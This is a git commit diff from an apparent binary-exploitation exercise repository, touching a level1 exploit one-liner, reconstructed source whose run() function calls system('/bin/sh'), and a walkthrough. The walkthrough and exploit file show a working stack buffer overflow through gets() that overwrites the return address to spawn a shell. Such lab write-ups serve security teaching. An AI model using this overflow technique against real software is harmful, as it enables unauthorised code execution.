fix: bunch of improvements and typos in the walkthrough

2025-05-07 14:04:04 +02:00
parent ca011b34f4
commit fb1ba7aee8
11 changed files with 35 additions and 24 deletions
--- a/level1/ressources/exploit
+++ b/level1/ressources/exploit
@ -1 +1 @@
-(python -c 'print("a"*76 + "\x44\x84\x04\x08")'; cat) | ./level1
+(python -c 'print("A"*76 + "\x44\x84\x04\x08")'; cat) | ./level1
--- a/level1/source.c
+++ b/level1/source.c
@ -1,4 +1,11 @@
 #include <stdio.h>
+#include <stdlib.h>
+
+void run(void)
+{
+	fwrite("Good... Wait what?\n", 1, 19, stdout);
+	system("/bin/sh");
+}

 int main(void)
 {
--- a/level1/walkthrough
+++ b/level1/walkthrough
@ -1,9 +1,9 @@
 # Level1

-Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`.
+Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets()`.
 We can exploit this call to overflow the stack and call another function.
-In the binary, there is a function `run()` located at address 0x8048444 that runs `/bin/sh`.
+In the binary, there is a function `run()` located at address 0x8048444 that calls `system("/bin/sh")`.
 To exploit this, we can use this sh command with this inline python script:
-`(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1`
-This will print `run()`'s address on the stack, after the buffer being written to by `gets`, resulting in a call to the function.
+`(print('A'*76 + "\x44\x84\x04\x08"); cat) | ./level1`
+This will print `run()`'s address to `eip`, after the buffer being written to by `gets()`, resulting in a call to the function.
 The parenthesis and the `cat` are mandatory to make it blocking and keep the shell opened.